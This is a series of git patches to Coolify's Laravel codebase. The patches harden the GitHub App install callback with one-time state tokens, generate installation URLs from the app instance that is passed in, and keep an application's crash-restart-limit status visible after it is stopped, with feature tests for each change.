+use Illuminate\Http\RedirectResponse;
 use Illuminate\Http\Request;
 use Illuminate\Support\Facades\Cache;
 use Illuminate\Support\Facades\Http;
@@ -539,19 +541,22 @@ public function redirect(Request $request)
 
     public function install(Request $request)
     {
-        $source = (string) $request->query('source', '');
-        abort_if(blank($source), 404);
-
-        $github_app = GithubApp::ownedByCurrentTeam()->where('uuid', $source)->firstOrFail();
-
         $setup_action = (string) $request->query('setup_action', '');
-        if ($setup_action !== 'install') {
-            return redirect()->route('source.github.show', ['github_app_uuid' => $github_app->uuid]);
-        }
+        abort_unless(in_array($setup_action, ['install', 'update'], true), 422, 'Invalid GitHub App setup action.');
 
         $installation_id = (string) $request->query('installation_id', '');
         abort_unless(ctype_digit($installation_id), 422, 'Missing GitHub App installation id.');
 
+        if ($setup_action === 'update') {
+            return $this->redirectAfterGithubAppInstallationUpdate($installation_id);
+        }
+
+        $github_app = $this->consumeGithubAppSetupState(
+            request: $request,
+            state: (string) $request->query('state', ''),
+            action: 'install',
+        );
+
         abort_unless(
             $this->githubInstallationBelongsToApp($github_app, $installation_id),
             403,
@@ -564,6 +569,19 @@ public function install(Request $request)
         return redirect()->route('source.github.show', ['github_app_uuid' => $github_app->uuid]);
     }
 
+    private function redirectAfterGithubAppInstallationUpdate(string $installation_id): RedirectResponse
+    {
+        $github_app = GithubApp::ownedByCurrentTeam()
+            ->where('installation_id', $installation_id)
+            ->first();
+
+        if ($github_app) {
+            return redirect()->route('source.github.show', ['github_app_uuid' => $github_app->uuid]);
+        }
+
+        return redirect()->route('source.all');
+    }
+
     /**
      * Verify that the given installation id actually belongs to this GitHub App.
      *
@@ -596,11 +614,14 @@ private function githubInstallationBelongsToApp(GithubApp $github_app, string $i
 
     private function consumeGithubAppSetupState(Request $request, string $state, string $action): GithubApp
     {
-        abort_if(blank($state), 404);
+        if (blank($state)) {
+            $this->rejectInvalidGithubAppSetupState($request);
+        }
 
         $payload = Cache::pull($this->githubAppSetupStateCacheKey($state));
-        abort_unless(is_array($payload), 404);
-        abort_unless(data_get($payload, 'action') === $action, 404);
+        if (! is_array($payload) || data_get($payload, 'action') !== $action) {
+            $this->rejectInvalidGithubAppSetupState($request);
+        }
 
         $team_id = $request->user()?->currentTeam()?->id;
         abort_unless(! is_null($team_id) && (int) data_get($payload, 'team_id') === $team_id, 403);
@@ -610,6 +631,18 @@ private function consumeGithubAppSetupState(Request $request, string $state, str
             ->firstOrFail();
     }
 
+    private function rejectInvalidGithubAppSetupState(Request $request): never
+    {
+        if ($request->expectsJson()) {
+            abort(404);
+        }
+
+        throw new HttpResponseException(
+            redirect()
+                ->route('source.all')
+        );
+    }
+
     private function githubAppSetupStateCacheKey(string $state): string
     {
         return 'github-app-setup-state:'.hash('sha256', $state);
diff --git a/app/Livewire/Source/Github/Change.php b/app/Livewire/Source/Github/Change.php
index 1470b95db..74ed812af 100644
--- a/app/Livewire/Source/Github/Change.php
+++ b/app/Livewire/Source/Github/Change.php
@@ -210,6 +210,8 @@ public function checkPermissions()
 
             GithubAppPermissionJob::dispatchSync($this->github_app);
             $this->github_app->refresh()->makeVisible('client_secret')->makeVisible('webhook_secret');
+            $this->syncData(false);
+
             $this->dispatch('success', 'Github App permissions updated.');
         } catch (\Throwable $e) {
             // Provide better error message for unsupported key formats
diff --git a/bootstrap/helpers/github.php b/bootstrap/helpers/github.php
index 4a61960fb..bb819e4aa 100644
--- a/bootstrap/helpers/github.php
+++ b/bootstrap/helpers/github.php
@@ -4,6 +4,7 @@
 use App\Models\GitlabApp;
 use Carbon\Carbon;
 use Carbon\CarbonImmutable;
+use Illuminate\Support\Facades\Cache;
 use Illuminate\Support\Facades\Http;
 use Illuminate\Support\Str;
 use Lcobucci\JWT\Encoding\ChainedFormatter;
@@ -20,7 +21,7 @@ function generateGithubToken(GithubApp $source, string $type)
     $timeDiff = abs($serverTime->diffInSeconds($githubTime));
 
     if ($timeDiff > 50) {
-        throw new \Exception(
+        throw new Exception(
             'System time is out of sync with GitHub API time:<br>'.
             '- System time: '.$serverTime->format('Y-m-d H:i:s').' UTC<br>'.
             '- GitHub time: '.$githubTime->format('Y-m-d H:i:s').' UTC<br>'.
@@ -60,7 +61,7 @@ function generateGithubToken(GithubApp $source, string $type)
 
             return $response->json()['token'];
         })(),
-        default => throw new \InvalidArgumentException("Unsupported token type: {$type}")
+        default => throw new InvalidArgumentException("Unsupported token type: {$type}")
     };
 }
 
@@ -77,11 +78,11 @@ function generateGithubJwt(GithubApp $source)
 function githubApi(GithubApp|GitlabApp|null $source, string $endpoint, string $method = 'get', ?array $data = null, bool $throwError = true)
 {
     if (is_null($source)) {
-        throw new \Exception('Source is required for API calls');
+        throw new Exception('Source is required for API calls');
     }
 
     if ($source->getMorphClass() !== GithubApp::class) {
-        throw new \InvalidArgumentException("Unsupported source type: {$source->getMorphClass()}");
+        throw new InvalidArgumentException("Unsupported source type: {$source->getMorphClass()}");
     }
 
     if ($source->is_public) {
@@ -100,7 +101,7 @@ function githubApi(GithubApp|GitlabApp|null $source, string $endpoint, string $m
         $errorMessage = data_get($response->json(), 'message', 'no error message found');
         $remainingCalls = $response->header('X-RateLimit-Remaining', '0');
 
-        throw new \Exception(
+        throw new Exception(
             'GitHub API call failed:<br>'.
             "Error: {$errorMessage}<br>".
             'Rate Limit Status:<br>'.
@@ -116,13 +117,20 @@ function githubApi(GithubApp|GitlabApp|null $source, string $endpoint, string $m
     ];
 }
 
-function getInstallationPath(GithubApp $source)
+function getInstallationPath(GithubApp $source): string
 {
     $github = GithubApp::where('uuid', $source->uuid)->first();
     $name = str(Str::kebab($github->name));
     $installation_path = $github->html_url === 'https://github.com' ? 'apps' : 'github-apps';
+    $state = Str::random(64);
 
-    return "$github->html_url/$installation_path/$name/installations/new";
+    Cache::put('github-app-setup-state:'.hash('sha256', $state), [
+        'action' => 'install',
+        'github_app_id' => $github->id,
+        'team_id' => $github->team_id,
+    ], now()->addMinutes(60));
+
+    return "$github->html_url/$installation_path/$name/installations/new?".http_build_query(['state' => $state]);
 }
 
 function getPermissionsPath(GithubApp $source)
diff --git a/resources/views/livewire/source/github/change.blade.php b/resources/views/livewire/source/github/change.blade.php
index d52e35646..dc9560a1f 100644
--- a/resources/views/livewire/source/github/change.blade.php
+++ b/resources/views/livewire/source/github/change.blade.php
@@ -351,9 +351,8 @@ class="px-2 py-1 text-xs font-bold uppercase tracking-wide bg-neutral-100 dark:b
                 function createGithubApp(webhook_endpoint, use_custom_webhook_endpoint, custom_webhook_endpoint, preview_deployment_permissions, administration) {
                     const {
                         organization,
-                        html_url,
-                        uuid
-                    } = @js($github_app->only(['organization', 'html_url', 'uuid']));
+                        html_url
+                    } = @js($github_app->only(['organization', 'html_url']));
                     const selectedEndpoint = webhook_endpoint ? webhook_endpoint.trim() : '';
                     const customEndpoint = custom_webhook_endpoint ? custom_webhook_endpoint.trim() : '';
                     if (use_custom_webhook_endpoint && !customEndpoint) {
@@ -401,7 +400,7 @@ function createGithubApp(webhook_endpoint, use_custom_webhook_endpoint, custom_w
                         callback_urls: [`${baseUrl}/login/github/app`],
                         public: false,
                         request_oauth_on_install: false,
-                        setup_url: `${webhookBaseUrl}/source/github/install?source=${uuid}`,
+                        setup_url: `${webhookBaseUrl}/source/github/install`,
                         setup_on_update: true,
                         default_permissions,
                         default_events
diff --git a/tests/Feature/GithubSourceChangeTest.php b/tests/Feature/GithubSourceChangeTest.php
index 91296dd0f..e6f758682 100644
--- a/tests/Feature/GithubSourceChangeTest.php
+++ b/tests/Feature/GithubSourceChangeTest.php
@@ -7,6 +7,8 @@
 use App\Models\Team;
 use App\Models\User;
 use Illuminate\Foundation\Testing\RefreshDatabase;
+use Illuminate\Support\Facades\Cache;
+use Illuminate\Support\Facades\Http;
 use Livewire\Livewire;
 
 uses(RefreshDatabase::class);
@@ -84,6 +86,44 @@ function validPrivateKey(): string
             ->assertSet('privateKeyId', null);
     });
 
+    test('creates one-time states for manifest conversion and installation callbacks', function () {
+        $githubApp = GithubApp::create([
+            'name' => 'Test GitHub App',
+            'api_url' => 'https://api.github.com',
+            'html_url' => 'https://github.com',
+            'custom_user' => 'git',
+            'custom_port' => 22,
+            'team_id' => $this->team->id,
+            'is_system_wide' => false,
+        ]);
+
+        $component = Livewire::withQueryParams(['github_app_uuid' => $githubApp->uuid])
+            ->test(Change::class)
+            ->assertSuccessful();
+
+        $manifestState = $component->get('manifestState');
+        $installationUrl = getInstallationPath($githubApp);
+        parse_str(parse_url($installationUrl, PHP_URL_QUERY), $query);
+        $installState = $query['state'] ?? null;
+
+        expect($manifestState)->not->toBeEmpty()
+            ->and($installState)->not->toBeEmpty()
+            ->and($installState)->not->toBe($manifestState)
+            ->and($installationUrl)->not->toContain($githubApp->uuid)
+            ->and(Cache::get('github-app-setup-state:'.hash('sha256', $manifestState)))
+            ->toMatchArray([
+                'action' => 'manifest',
+                'github_app_id' => $githubApp->id,
+                'team_id' => $githubApp->team_id,
+            ])
+            ->and(Cache::get('github-app-setup-state:'.hash('sha256', $installState)))
+            ->toMatchArray([
+                'action' => 'install',
+                'github_app_id' => $githubApp->id,
+                'team_id' => $githubApp->team_id,
+            ]);
+    });
+
     test('defaults webhook endpoint to app url when it is the first available endpoint', function () {
         config(['app.url' => 'http://localhost:8000']);
 
@@ -305,4 +345,63 @@ function validPrivateKey(): string
                 return str_contains($message, 'Private Key not found');
             });
     });
+
+    test('checkPermissions syncs refetched permissions into input fields', function () {
+        $privateKey = PrivateKey::create([
+            'name' => 'Test Key',
+            'private_key' => validPrivateKey(),
+            'team_id' => $this->team->id,
+        ]);
+
+        $githubApp = GithubApp::create([
+            'name' => 'Test GitHub App',
+            'api_url' => 'https://api.github.com',
+            'html_url' => 'https://github.com',
+            'custom_user' => 'git',
+            'custom_port' => 22,
+            'app_id' => 12345,
+            'installation_id' => 67890,
+            'client_id' => 'test-client-id',
+            'client_secret' => 'test-client-secret',
+            'webhook_secret' => 'test-webhook-secret',
+            'private_key_id' => $privateKey->id,
+            'team_id' => $this->team->id,
+            'is_system_wide' => false,
+            'contents' => null,
+            'metadata' => null,
+            'pull_requests' => null,
+        ]);
+
+        Http::preventStrayRequests();
+        Http::fake([
+            'https://api.github.com/zen' => Http::response('Keep it logically awesome.', 200, [
+                'date' => now()->toRfc7231String(),
+            ]),
+            'https://api.github.com/app' => Http::response([
+                'permissions' => [
+                    'contents' => 'read',
+                    'metadata' => 'read',
+                    'pull_requests' => 'write',
+                ],
+            ]),
+        ]);
+
+        Livewire::withQueryParams(['github_app_uuid' => $githubApp->uuid])
+            ->test(Change::class)
+            ->assertSuccessful()
+            ->assertSet('contents', null)
+            ->assertSet('metadata', null)
+            ->assertSet('pullRequests', null)
+            ->call('checkPermissions')
+            ->assertDispatched('success')
+            ->assertSet('contents', 'read')
+            ->assertSet('metadata', 'read')
+            ->assertSet('pullRequests', 'write');
+
+        $githubApp->refresh();
+
+        expect($githubApp->contents)->toBe('read')
+            ->and($githubApp->metadata)->toBe('read')
+            ->and($githubApp->pull_requests)->toBe('write');
+    });
 });
diff --git a/tests/Feature/Security/GithubAppSetupCallbackTest.php b/tests/Feature/Security/GithubAppSetupCallbackTest.php
index 9c6893fd1..f56a77d5f 100644
--- a/tests/Feature/Security/GithubAppSetupCallbackTest.php
+++ b/tests/Feature/Security/GithubAppSetupCallbackTest.php
@@ -199,8 +199,9 @@ function fakeGithubInstallationVerificationFailure(): void
 
 it('requires authentication before processing github app install callbacks', function () {
     Http::preventStrayRequests();
+    cacheGithubAppSetupState('valid-install-state', 'install', $this->githubApp);
 
-    $this->get('/webhooks/source/github/install?source='.$this->githubApp->uuid.'&setup_action=install&installation_id=123456')
+    $this->get('/webhooks/source/github/install?state=valid-install-state&setup_action=install&installation_id=123456')
         ->assertRedirect();
 
     Http::assertNothingSent();
@@ -209,22 +210,110 @@ function fakeGithubInstallationVerificationFailure(): void
     expect($this->githubApp->installation_id)->toBeNull();
 });
 
-it('rejects github app install callbacks for an unknown github app', function () {
+it('rejects github app install callbacks with an app uuid as state', function () {
     authenticateGithubSetupCallbackTest($this);
     Http::preventStrayRequests();
 
-    $this->withHeader('Accept', 'application/json')->get('/webhooks/source/github/install?source=does-not-exist&setup_action=install&installation_id=123456')
+    $this->withHeader('Accept', 'application/json')->get('/webhooks/source/github/install?state='.$this->githubApp->uuid.'&setup_action=install&installation_id=123456')
         ->assertNotFound();
 
     Http::assertNothingSent();
 });
 
+it('redirects browser github app install callbacks with missing or expired state to sources', function () {
+    authenticateGithubSetupCallbackTest($this);
+    Http::preventStrayRequests();
+
+    $this->get('/webhooks/source/github/install?setup_action=install&installation_id=123456')
+        ->assertRedirect(route('source.all'));
+
+    $this->get('/webhooks/source/github/install?state=expired-state&setup_action=install&installation_id=123456')
+        ->assertRedirect(route('source.all'));
+
+    Http::assertNothingSent();
+});
+
+it('rejects github app setup states for the wrong callback action', function () {
+    authenticateGithubSetupCallbackTest($this);
+    Http::preventStrayRequests();
+    cacheGithubAppSetupState('manifest-state', 'manifest', $this->githubApp);
+    cacheGithubAppSetupState('install-state', 'install', $this->githubApp);
+
+    $this->withHeader('Accept', 'application/json')->get('/webhooks/source/github/install?state=manifest-state&setup_action=install&installation_id=123456')
+        ->assertNotFound();
+
+    $this->withHeader('Accept', 'application/json')->get('/webhooks/source/github/redirect?state=install-state&code=real-code')
+        ->assertNotFound();
+
+    Http::assertNothingSent();
+});
+
+it('allows github app install callbacks for repository update setup actions', function () {
+    authenticateGithubSetupCallbackTest($this);
+    configureGithubAppCredentials($this->githubApp);
+    $this->githubApp->forceFill(['installation_id' => 111111])->save();
+    Http::preventStrayRequests();
+
+    $this->get('/webhooks/source/github/install?setup_action=update&installation_id=111111')
+        ->assertRedirect(route('source.github.show', ['github_app_uuid' => $this->githubApp->uuid]));
+
+    Http::assertNothingSent();
+
+    $this->githubApp->refresh();
+    expect($this->githubApp->installation_id)->toBe(111111);
+});
+
+it('redirects github app repository update callbacks without a matching source to the sources page', function () {
+    authenticateGithubSetupCallbackTest($this);
+    Http::preventStrayRequests();
+
+    $this->get('/webhooks/source/github/install?setup_action=update&installation_id=123456')
+        ->assertRedirect(route('source.all'));
+
+    Http::assertNothingSent();
+});
+
+it('rejects github app install callbacks for unknown setup actions', function () {
+    authenticateGithubSetupCallbackTest($this);
+    Http::preventStrayRequests();
+    cacheGithubAppSetupState('valid-install-state', 'install', $this->githubApp);
+
+    $this->withHeader('Accept', 'application/json')->get('/webhooks/source/github/install?state=valid-install-state&setup_action=remove&installation_id=123456')
+        ->assertUnprocessable();
+
+    Http::assertNothingSent();
+});
+
+it('rejects github app setup states from another team', function () {
+    authenticateGithubSetupCallbackTest($this);
+    Http::preventStrayRequests();
+
+    $otherTeam = Team::factory()->create();
+    $otherGithubApp = GithubApp::create([
+        'name' => 'Other GitHub App',
+        'api_url' => 'https://api.github.com',
+        'html_url' => 'https://github.com',
+        'custom_user' => 'git',
+        'custom_port' => 22,
+        'team_id' => $otherTeam->id,
+        'is_system_wide' => false,
+    ]);
+
+    cacheGithubAppSetupState('other-team-state', 'manifest', $otherGithubApp);
+
+    $this->withHeader('Accept', 'application/json')->get('/webhooks/source/github/redirect?state=other-team-state&code=real-code')
+        ->assertForbidden();
+
+    Http::assertNothingSent();
+});
+
 it('rejects an installation id that github does not confirm belongs to the app', function () {
     authenticateGithubSetupCallbackTest($this);
     configureGithubAppCredentials($this->githubApp);
     fakeGithubInstallationVerificationFailure();
+    cacheGithubAppSetupState('valid-install-state', 'install', $this->githubApp);
 
-    $this->withHeader('Accept', 'application/json')->get('/webhooks/source/github/install?source='.$this->githubApp->uuid.'&setup_action=install&installation_id=999999')
+    $this->withHeader('Accept', 'application/json')->get('/webhooks/source/github/install?state=valid-install-state&setup_action=install&installation_id=999999')
         ->assertForbidden();
 
     $this->githubApp->refresh();
@@ -235,21 +324,39 @@ function fakeGithubInstallationVerificationFailure(): void
     authenticateGithubSetupCallbackTest($this);
     configureGithubAppCredentials($this->githubApp);
     fakeGithubInstallationVerification($this->githubApp->app_id);
+    cacheGithubAppSetupState('valid-install-state', 'install', $this->githubApp);
 
-    $this->get('/webhooks/source/github/install?source='.$this->githubApp->uuid.'&setup_action=install&installation_id=123456')
+    $this->get('/webhooks/source/github/install?state=valid-install-state&setup_action=install&installation_id=123456')
         ->assertRedirect(route('source.github.show', ['github_app_uuid' => $this->githubApp->uuid]));
 
     $this->githubApp->refresh();
     expect($this->githubApp->installation_id)->toBe(123456);
 });
 
+it('rejects replayed github app install states', function () {
+    authenticateGithubSetupCallbackTest($this);
+    configureGithubAppCredentials($this->githubApp);
+    fakeGithubInstallationVerification($this->githubApp->app_id);
+    cacheGithubAppSetupState('valid-install-state', 'install', $this->githubApp);
+
+    $this->get('/webhooks/source/github/install?state=valid-install-state&setup_action=install&installation_id=123456')
+        ->assertRedirect();
+
+    $this->withHeader('Accept', 'application/json')->get('/webhooks/source/github/install?state=valid-install-state&setup_action=install&installation_id=123456')
+        ->assertNotFound();
+
+    $this->githubApp->refresh();
+    expect($this->githubApp->installation_id)->toBe(123456);
+});
+
 it('allows reinstalling an already configured github app installation id', function () {
     authenticateGithubSetupCallbackTest($this);
     configureGithubAppCredentials($this->githubApp);
     $this->githubApp->forceFill(['installation_id' => 111111])->save();
     fakeGithubInstallationVerification($this->githubApp->app_id);
+    cacheGithubAppSetupState('valid-install-state', 'install', $this->githubApp);
 
-    $this->get('/webhooks/source/github/install?source='.$this->githubApp->uuid.'&setup_action=install&installation_id=222222')
+    $this->get('/webhooks/source/github/install?state=valid-install-state&setup_action=install&installation_id=222222')
         ->assertRedirect(route('source.github.show', ['github_app_uuid' => $this->githubApp->uuid]));
 
     $this->githubApp->refresh();

From a047971bc1568ff833047d3ca5b6fc4e53209aa7 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 3 Jun 2026 10:07:57 +0200
Subject: [PATCH 87/90] fix(github): use provided app for installation URLs

Generate GitHub App installation links and setup cache state from the
current app instance, and keep the Livewire app name in sync after
permission checks.
---
 app/Livewire/Source/Github/Change.php    |  1 +
 bootstrap/helpers/github.php             | 11 +++++------
 tests/Feature/GithubSourceChangeTest.php | 25 ++++++++++++++++++++++++
 3 files changed, 31 insertions(+), 6 deletions(-)

diff --git a/app/Livewire/Source/Github/Change.php b/app/Livewire/Source/Github/Change.php
index 74ed812af..648bfe6ee 100644
--- a/app/Livewire/Source/Github/Change.php
+++ b/app/Livewire/Source/Github/Change.php
@@ -211,6 +211,7 @@ public function checkPermissions()
             GithubAppPermissionJob::dispatchSync($this->github_app);
             $this->github_app->refresh()->makeVisible('client_secret')->makeVisible('webhook_secret');
             $this->syncData(false);
+            $this->name = str($this->github_app->name)->kebab();
 
             $this->dispatch('success', 'Github App permissions updated.');
         } catch (\Throwable $e) {
diff --git a/bootstrap/helpers/github.php b/bootstrap/helpers/github.php
index bb819e4aa..0ec76f6fa 100644
--- a/bootstrap/helpers/github.php
+++ b/bootstrap/helpers/github.php
@@ -119,18 +119,17 @@ function githubApi(GithubApp|GitlabApp|null $source, string $endpoint, string $m
 
 function getInstallationPath(GithubApp $source): string
 {
-    $github = GithubApp::where('uuid', $source->uuid)->first();
-    $name = str(Str::kebab($github->name));
-    $installation_path = $github->html_url === 'https://github.com' ? 'apps' : 'github-apps';
+    $name = str(Str::kebab($source->name));
+    $installation_path = $source->html_url === 'https://github.com' ? 'apps' : 'github-apps';
     $state = Str::random(64);
 
     Cache::put('github-app-setup-state:'.hash('sha256', $state), [
         'action' => 'install',
-        'github_app_id' => $github->id,
-        'team_id' => $github->team_id,
+        'github_app_id' => $source->id,
+        'team_id' => $source->team_id,
     ], now()->addMinutes(60));
 
-    return "$github->html_url/$installation_path/$name/installations/new?".http_build_query(['state' => $state]);
+    return "$source->html_url/$installation_path/$name/installations/new?".http_build_query(['state' => $state]);
 }
 
 function getPermissionsPath(GithubApp $source)
diff --git a/tests/Feature/GithubSourceChangeTest.php b/tests/Feature/GithubSourceChangeTest.php
index e6f758682..07bc2a2c3 100644
--- a/tests/Feature/GithubSourceChangeTest.php
+++ b/tests/Feature/GithubSourceChangeTest.php
@@ -124,6 +124,29 @@ function validPrivateKey(): string
             ]);
     });
 
+    test('installation path is generated from the provided github app instance', function () {
+        $githubApp = new GithubApp;
+        $githubApp->forceFill([
+            'id' => 123,
+            'name' => 'Provided GitHub App',
+            'html_url' => 'https://github.example.com',
+            'team_id' => 456,
+        ]);
+
+        $installationUrl = getInstallationPath($githubApp);
+        parse_str(parse_url($installationUrl, PHP_URL_QUERY), $query);
+        $installState = $query['state'] ?? null;
+
+        expect($installationUrl)->toStartWith('https://github.example.com/github-apps/provided-git-hub-app/installations/new?')
+            ->and($installState)->not->toBeEmpty()
+            ->and(Cache::get('github-app-setup-state:'.hash('sha256', $installState)))
+            ->toMatchArray([
+                'action' => 'install',
+                'github_app_id' => 123,
+                'team_id' => 456,
+            ]);
+    });
+
     test('defaults webhook endpoint to app url when it is the first available endpoint', function () {
         config(['app.url' => 'http://localhost:8000']);
 
@@ -389,11 +412,13 @@ function validPrivateKey(): string
         Livewire::withQueryParams(['github_app_uuid' => $githubApp->uuid])
             ->test(Change::class)
             ->assertSuccessful()
+            ->assertSet('name', 'test-git-hub-app')
             ->assertSet('contents', null)
             ->assertSet('metadata', null)
             ->assertSet('pullRequests', null)
             ->call('checkPermissions')
             ->assertDispatched('success')
+            ->assertSet('name', 'test-git-hub-app')
             ->assertSet('contents', 'read')
             ->assertSet('metadata', 'read')
             ->assertSet('pullRequests', 'write');

From aaa540421fbd99a23dd2442340aee6076e4f638e Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 3 Jun 2026 11:01:28 +0200
Subject: [PATCH 88/90] feat(application): preserve crash restart limit status

Stop applications after they hit the crash restart limit without clearing
restart tracking, surface the stopped-limit warning in status UI, and use
the application link in restart limit notifications.
---
 app/Actions/Application/StopApplication.php   | 19 +++--
 app/Actions/Docker/GetContainersStatus.php    | 13 ++-
 app/Models/Application.php                    |  9 ++
 .../Application/RestartLimitReached.php       |  3 +-
 .../views/components/status/index.blade.php   | 13 ++-
 .../project/application/heading.blade.php     |  2 +-
 ...pplicationStoppedAfterRestartLimitTest.php | 82 +++++++++++++++++++
 7 files changed, 128 insertions(+), 13 deletions(-)
 create mode 100644 tests/Feature/ApplicationStoppedAfterRestartLimitTest.php

diff --git a/app/Actions/Application/StopApplication.php b/app/Actions/Application/StopApplication.php
index b79709c5a..bfad20ccf 100644
--- a/app/Actions/Application/StopApplication.php
+++ b/app/Actions/Application/StopApplication.php
@@ -13,7 +13,7 @@ class StopApplication
 
     public string $jobQueue = 'high';
 
-    public function handle(Application $application, bool $previewDeployments = false, bool $dockerCleanup = true)
+    public function handle(Application $application, bool $previewDeployments = false, bool $dockerCleanup = true, bool $resetRestartCount = true)
     {
         $servers = collect([$application->destination->server]);
         if ($application?->additional_servers?->count() > 0) {
@@ -57,12 +57,17 @@ public function handle(Application $application, bool $previewDeployments = fals
             }
         }
 
-        // Reset restart tracking when application is manually stopped
-        $application->update([
-            'restart_count' => 0,
-            'last_restart_at' => null,
-            'last_restart_type' => null,
-        ]);
+        if ($resetRestartCount) {
+            $application->update([
+                'restart_count' => 0,
+                'last_restart_at' => null,
+                'last_restart_type' => null,
+            ]);
+        } else {
+            $application->update([
+                'status' => 'exited',
+            ]);
+        }
 
         ServiceStatusChanged::dispatch($application->environment->project->team->id);
     }
diff --git a/app/Actions/Docker/GetContainersStatus.php b/app/Actions/Docker/GetContainersStatus.php
index cfac83583..904885dfc 100644
--- a/app/Actions/Docker/GetContainersStatus.php
+++ b/app/Actions/Docker/GetContainersStatus.php
@@ -466,7 +466,9 @@ public function handle(Server $server, ?Collection $containers = null, ?Collecti
                 }
 
                 // Wrap all database updates in a transaction to ensure consistency
-                DB::transaction(function () use ($application, $maxRestartCount, $containerStatuses) {
+                $restartLimitReached = false;
+
+                DB::transaction(function () use ($application, $maxRestartCount, $containerStatuses, &$restartLimitReached) {
                     $previousRestartCount = $application->restart_count ?? 0;
 
                     if ($maxRestartCount > $previousRestartCount) {
@@ -480,8 +482,7 @@ public function handle(Server $server, ?Collection $containers = null, ?Collecti
                         // Check if restart limit has been reached
                         $maxAllowedRestarts = $application->max_restart_count ?? 0;
                         if ($maxAllowedRestarts > 0 && $maxRestartCount >= $maxAllowedRestarts && $previousRestartCount < $maxAllowedRestarts) {
-                            StopApplication::dispatch($application);
-                            $application->environment->project->team?->notify(new ApplicationRestartLimitReached($application));
+                            $restartLimitReached = true;
                         }
                     }
 
@@ -496,6 +497,12 @@ public function handle(Server $server, ?Collection $containers = null, ?Collecti
                         }
                     }
                 });
+
+                if ($restartLimitReached) {
+                    $application->refresh();
+                    StopApplication::dispatch($application, false, true, false);
+                    $application->environment->project->team?->notify(new ApplicationRestartLimitReached($application));
+                }
             }
         }
 
diff --git a/app/Models/Application.php b/app/Models/Application.php
index eee67022f..1ffa62584 100644
--- a/app/Models/Application.php
+++ b/app/Models/Application.php
@@ -572,6 +572,15 @@ public function link()
         return null;
     }
 
+    public function stoppedAfterRestartLimit(): bool
+    {
+        return str($this->status)->startsWith('exited')
+            && ($this->restart_count ?? 0) > 0
+            && ($this->max_restart_count ?? 0) > 0
+            && $this->restart_count >= $this->max_restart_count
+            && $this->last_restart_type === 'crash';
+    }
+
     public function taskLink($task_uuid)
     {
         if (data_get($this, 'environment.project.uuid')) {
diff --git a/app/Notifications/Application/RestartLimitReached.php b/app/Notifications/Application/RestartLimitReached.php
index 8709e7cd3..635dfdbdc 100644
--- a/app/Notifications/Application/RestartLimitReached.php
+++ b/app/Notifications/Application/RestartLimitReached.php
@@ -30,6 +30,7 @@ class RestartLimitReached extends CustomEmailNotification
     public function __construct(public Application $resource)
     {
         $this->onQueue('high');
+        $this->afterCommit();
         $this->resource_name = data_get($resource, 'name');
         $this->project_uuid = data_get($resource, 'environment.project.uuid');
         $this->environment_uuid = data_get($resource, 'environment.uuid');
@@ -40,7 +41,7 @@ public function __construct(public Application $resource)
         if (str($this->fqdn)->explode(',')->count() > 1) {
             $this->fqdn = str($this->fqdn)->explode(',')->first();
         }
-        $this->resource_url = base_url()."/project/{$this->project_uuid}/environment/{$this->environment_uuid}/application/{$this->resource->uuid}";
+        $this->resource_url = $this->resource->link() ?? base_url()."/project/{$this->project_uuid}/environment/{$this->environment_uuid}/application/{$this->resource->uuid}";
     }
 
     public function via(object $notifiable): array
diff --git a/resources/views/components/status/index.blade.php b/resources/views/components/status/index.blade.php
index 8d959ce6e..b54e35bd5 100644
--- a/resources/views/components/status/index.blade.php
+++ b/resources/views/components/status/index.blade.php
@@ -2,7 +2,11 @@
     'title' => null,
     'lastDeploymentLink' => null,
     'resource' => null,
+    'showRefreshButton' => true,
 ])
+@php
+    $stoppedAfterRestartLimit = $resource && method_exists($resource, 'stoppedAfterRestartLimit') && $resource->stoppedAfterRestartLimit();
+@endphp
 <div class="flex flex-wrap items-center gap-1">
     @if (str($resource->status)->startsWith('running'))
         <x-status.running :status="$resource->status" :title="$title" :lastDeploymentLink="$lastDeploymentLink" />
@@ -13,13 +17,20 @@
     @else
         <x-status.stopped :status="$resource->status" />
     @endif
-    @if (isset($resource->restart_count) && $resource->restart_count > 0 && !str($resource->status)->startsWith('exited'))
+    @if (isset($resource->restart_count) && $resource->restart_count > 0 && (!str($resource->status)->startsWith('exited') || $stoppedAfterRestartLimit))
         <div class="flex items-center">
             <span class="text-xs dark:text-warning" title="Container has restarted {{ $resource->restart_count }} time{{ $resource->restart_count > 1 ? 's' : '' }}. Last restart: {{ $resource->last_restart_at?->diffForHumans() }}">
                 ({{ $resource->restart_count }}x restarts)
             </span>
         </div>
     @endif
+    @if ($stoppedAfterRestartLimit)
+        <div class="flex items-center">
+            <span class="text-xs dark:text-warning" title="Container has crashed and Coolify stopped it after {{ $resource->restart_count }} restart attempts.">
+                Stopped after reaching restart limit ({{ $resource->restart_count }}/{{ $resource->max_restart_count }}).
+            </span>
+        </div>
+    @endif
     @if (!str($resource->status)->contains('exited') && $showRefreshButton)
         <button wire:loading.remove.delay.shortest wire:target="manualCheckStatus" title="Refresh Status" wire:click='manualCheckStatus'
             class="dark:hover:fill-white fill-black dark:fill-warning">
diff --git a/resources/views/livewire/project/application/heading.blade.php b/resources/views/livewire/project/application/heading.blade.php
index d69709f06..544bc2dc2 100644
--- a/resources/views/livewire/project/application/heading.blade.php
+++ b/resources/views/livewire/project/application/heading.blade.php
@@ -15,7 +15,7 @@ class="scrollbar flex min-h-10 w-full flex-nowrap items-center gap-6 overflow-x-
                 href="{{ route('project.application.logs', $parameters) }}">
                 <div class="flex items-center gap-1">
                     Logs
-                    @if ($application->restart_count > 0 && !str($application->status)->startsWith('exited'))
+                    @if ($application->restart_count > 0 && (!str($application->status)->startsWith('exited') || $application->stoppedAfterRestartLimit()))
                         <svg class="w-4 h-4 dark:text-warning" viewBox="0 0 24 24" fill="currentColor" xmlns="http://www.w3.org/2000/svg" title="Container has restarted {{ $application->restart_count }} time{{ $application->restart_count > 1 ? 's' : '' }}">
                             <path d="M12 2L1 21h22L12 2zm0 4l7.53 13H4.47L12 6zm-1 5v4h2v-4h-2zm0 5v2h2v-2h-2z"/>
                         </svg>
diff --git a/tests/Feature/ApplicationStoppedAfterRestartLimitTest.php b/tests/Feature/ApplicationStoppedAfterRestartLimitTest.php
new file mode 100644
index 000000000..6b82d5568
--- /dev/null
+++ b/tests/Feature/ApplicationStoppedAfterRestartLimitTest.php
@@ -0,0 +1,82 @@
+<?php
+
+use App\Actions\Application\StopApplication;
+use App\Models\Application;
